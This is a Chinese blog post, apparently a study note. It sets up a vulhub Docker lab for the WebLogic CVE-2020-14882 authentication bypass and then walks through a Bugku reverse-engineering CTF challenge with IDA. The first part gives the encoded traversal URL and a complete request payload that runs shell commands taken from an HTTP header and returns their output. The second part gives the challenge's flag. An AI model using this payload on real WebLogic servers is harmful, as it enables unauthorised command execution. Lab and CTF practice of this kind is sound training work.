2021-08-27 我是一个憨憨天天不吃早餐 爱情与我无关整天郁郁寡欢

本文讲述了利用CVE-2020-14882未授权访问漏洞,通过Docker Compose在Weblogic服务器上进行环境搭建,并详细描述了如何访问漏洞路径以及CTF挑战的相关步骤,包括IDA工具的使用技巧。
摘要由CSDN通过智能技术生成

CVE-2020-14882
一道ctf
在这里插入图片描述

服务器搭建环境weblogic CVE-2020-14882
登上后 安装docker compose 把vulhub文件导进去
切换到漏洞所在位置

 cd /root/vulhub/vulhub/weblogic/CVE-2020-14882/

开启compose

 docker-compose build
 docker-compose up -d

对服务器来说 通过外网访问 不是ifconfig那个得到的ip
http://ip:7001/console/login/LoginForm.jsp
在这里插入图片描述
未授权访问漏洞http://ip:7001/console/css/%252e%252e%252fconsole.portal
不用登录就可以直接访问,
在这里插入图片描述
未授权访问路径:http://ip:7001/ws_utc/config.d
在这里插入图片描述

``
/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(‘weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(“connectionHandler”);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(“getServletRequest”).invoke(obj); String cmd = req.getHeader(“cmd”);String[] cmds = System.getProperty(“os.name”).toLowerCase().contains(“window”) ? new String[]{“cmd.exe”, “/c”, cmd} : new String[]{"/bin/sh", “-c”, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(“getResponse”).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();’) HTTP/1.1

在这里插入图片描述
whoami
在这里插入图片描述

成功

ctf re
题目来源:https://ctf.bugku.com/challenges/detail/id/115.html
在这里插入图片描述

在这里插入图片描述
IDA View-A是反汇编窗口,
HexView-A是十六进制格式显示的窗口,
Imports是导入表(程序中调用到的外面的函数),
Functions是函数表(这个程序中的函数),
Structures是结构,
Enums是枚举。
F5查看伪代码。如果按了F5没有反应的话,可能是IDA的问题,用x64的不行,换成x86。
在这里插入图片描述
DUTCTF{We1c0met0DUTCTF}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值